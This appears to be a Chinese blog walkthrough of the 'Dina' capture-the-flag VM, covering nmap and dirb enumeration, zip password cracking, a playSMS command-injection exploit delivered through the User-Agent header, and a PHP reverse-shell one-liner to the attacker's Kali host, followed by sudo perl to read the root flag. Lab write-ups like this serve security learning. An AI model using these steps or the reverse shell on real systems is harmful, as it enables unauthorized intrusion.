dina虚拟服务器,Dina渗透

2023-11-10 08:12
文章标签 服务器 虚拟 渗透 dina

本文主要是介绍dina虚拟服务器,Dina渗透,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Dian 是一台渗透测试用的虚拟环境,只是用于娱乐的主机,不过玩的还是挺开心的。写点笔记作为参考。使用的网络环境为 NAT 模式。

发现目标主机

利用扫描工具 nmap 扫描目标网段,寻找存活的目标主机。我的 NAT 模式网段在 192.168.43.1 这个网段上,可以用命令:

nmap 192.168.43.0/24

扫描目标端内所有的存活主机

edb2d19bee54610769b6265ec0be5a80.png

发现目标主机:192.168.43.130

开放端口:80

访问目标服务器

ad1df3130fa8b2b8955f30b089c65020.png

查看源代码什么的,发现没有什么入口什么的。可能需要寻找其他的入侵点。

发现登录入口

没事就看看 robots.txt,没准就有惊喜。查看 robots.txt。真的有惊喜!!!

1

2

3

4

5

6

User-agent: *

Disallow: /ange1

Disallow: /angel1

Disallow: /nothing

Disallow: /tmp

Disallow: /uploads

这几个几个页面依次访问一下,除了nothing这个页面,其他的都一个个文件夹,一度让我以为是文件上传,卡了很久。。。。。。头疼。后来想了一下,会不会还有什么页面没有出现,用dirb–kali 下的一个扫描的软件–默认字典就够了。

发现页面:http://192.168.43.130/secure/,访问得到一个压缩包,打开需要密码,结合前面 noting 页面发现的几个密码,一个个尝试发现工作量也不是很大,或者使用 zip2John 爆破,可以发现密码为freedom

nothing 页面发现的密码:

365244e3587f2f8f8a7e48edbe718aad.png

打开压缩包,提取文件,是一个后缀为 MP3 的文件,但是。。。我并不想听音乐,所以,先用 strings 命令查看一下有没有特殊的东西,有线索。。

cc1b8a9b993b5d765178546f8377fdf2.png

ok,发现新的页面,继续访问,是个登录页面,从压缩包中获取的文件得知,只有用户名,密码还是得一个个试。。。。测试过后得到:

username:touhid

password:diana

getshell

登录,发现是一个 playSMS 的网站,上网找一下有没有漏洞,早 exploit-DB 上面发现一个远程命令执行,发现可以使用,具体漏洞:https://www.exploit-db.com/exploits/42044。查看可知漏洞的点在于电话簿用户信息的导入,具体利用方式在漏洞说明中很清楚。直接可以使用。

漏洞利用文件:

3fa2f61c7ec2874b4b11c690568b0355.png

上传,利用 burpsuite 抓包,由于执行的命令在 USER_AGENT,所以修改 http 请求的 USER_AGENT 的内容为我们要执行的命令就可以了。

91d6205e88bde7af20fc8b0971f2e17f.png

结果:

5254fc0a5e8de4a472af15cf42d950f2.png

下一步就是反弹 shell 了,我的 kali 攻击机的 IP 地址为:192.168.43.129,所以把 shell 反弹到这就行了,监听 kali 的 8008 端口:

fb08cfbfa7d382cee2660effd99932ab.png

利用命令:

php -r '$sock=fsockopen("192.168.43.129",8008);exec("/bin/sh -i &3 2>&3");'

getshell:

e936d1587ab0e2fd4fc05fc72ce74a1b.png

成功进入主机!!!

1

sudo perl -e 'exec "cat /root/flag.txt";'

4c1a407792941a2066516444a6eb53d8.png

hack it!!

这篇关于dina虚拟服务器,Dina渗透的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381431

相关文章

服务器集群同步时间手记

1.时间服务器配置(必须root用户) (1)检查ntp是否安装 [root@node1 桌面]# rpm -qa|grep ntpntp-4.2.6p5-10.el6.centos.x86_64fontpackages-filesystem-1.41-1.1.el6.noarchntpdate-4.2.6p5-10.el6.centos.x86_64 (2)修改ntp配置文件 [r

Linux服务器Java启动脚本

Linux服务器Java启动脚本 1、初版2、优化版本3、常用脚本仓库 本文章介绍了如何在Linux服务器上执行Java并启动jar包, 通常我们会使用nohup直接启动,但是还是需要手动停止然后再次启动, 那如何更优雅的在服务器上启动jar包呢,让我们一起探讨一下吧。 1、初版 第一个版本是常用的做法,直接使用nohup后台启动jar包, 并将日志输出到当前文件夹n

速盾:直播 cdn 服务器带宽?

在当今数字化时代,直播已经成为了一种非常流行的娱乐和商业活动形式。为了确保直播的流畅性和高质量,直播平台通常会使用 CDN(Content Delivery Network,内容分发网络)服务器来分发直播流。而 CDN 服务器的带宽则是影响直播质量的一个重要因素。下面我们就来探讨一下速盾视角下的直播 CDN 服务器带宽问题。 一、直播对带宽的需求 高清视频流 直播通常需要传输高清视频

一种改进的red5集群方案的应用、基于Red5服务器集群负载均衡调度算法研究

转自: 一种改进的red5集群方案的应用: http://wenku.baidu.com/link?url=jYQ1wNwHVBqJ-5XCYq0PRligp6Y5q6BYXyISUsF56My8DP8dc9CZ4pZvpPz1abxJn8fojMrL0IyfmMHStpvkotqC1RWlRMGnzVL1X4IPOa_  基于Red5服务器集群负载均衡调度算法研究 http://ww

RTMP流媒体服务器 crtmpserver

http://www.oschina.net/p/crtmpserver crtmpserver又称rtmpd是Evostream Media Server(www.evostream.com)的社区版本采用GPLV3授权 其主要作用为一个高性能的RTMP流媒体服务器,可以实现直播与点播功能多终端支持功能,在特定情况下是FMS的良好替代品。 支持RTMP的一堆协议(RT

云原生之高性能web服务器学习(持续更新中)

高性能web服务器 1 Web服务器的基础介绍1.1 Web服务介绍1.1.1 Apache介绍1.1.2 Nginx-高性能的 Web 服务端 2 Nginx架构与安装2.1 Nginx概述2.1.1 Nginx 功能介绍2.1.2 基础特性2.1.3 Web 服务相关的功能 2.2 Nginx 架构和进程2.2.1 架构2.2.2 Ngnix进程结构 2.3 Nginx 模块介绍2.4

阿里云服务器ces

允许公网通过 HTTP、HTTPS 等服务访问实例 https://help.aliyun.com/document_detail/25475.html?spm=5176.2020520101.0.0.3ca96b0b3KGTPq#allowHttp

常见的服务器

常见的Web服务器 1、Tomcat:Tomcat和Java结合得最好,是Oracle官方推荐的JSP服务器。Tomcat是开源的Web服务器,经过长时间的发展,性能、稳定性等方面都非常优秀。 2、Jetty:另一个优秀的Web服务器。Jetty有个更大的优点是,Jetty可作为一个嵌入式服务器,即:如果在应用中加入Jetty的JAR文件,应用可在代码中对外提供Web服务。 3、Resin:

文章解读与仿真程序复现思路——电力自动化设备EI\CSCD\北大核心《考虑燃料电池和电解槽虚拟惯量支撑的电力系统优化调度方法》

本专栏栏目提供文章与程序复现思路,具体已有的论文与论文源程序可翻阅本博主免费的专栏栏目《论文与完整程序》 论文与完整源程序_电网论文源程序的博客-CSDN博客https://blog.csdn.net/liang674027206/category_12531414.html 电网论文源程序-CSDN博客电网论文源程序擅长文章解读,论文与完整源程序,等方面的知识,电网论文源程序关注python

Exchange 服务器地址列表的配置方法与注意事项

Exchange Server 是微软推出的一款企业级邮件服务器软件,广泛应用于企业内部邮件系统的搭建与管理。配置 Exchange 服务器地址列表是其中一个关键环节。本文将详细介绍 Exchange 服务器地址列表的配置方法与注意事项,帮助系统管理员顺利完成这一任务。 内容目录 1. 引言 2. 准备工作 3. 配置地址列表 3.1 创建地址列表 3.2 使用 Exchange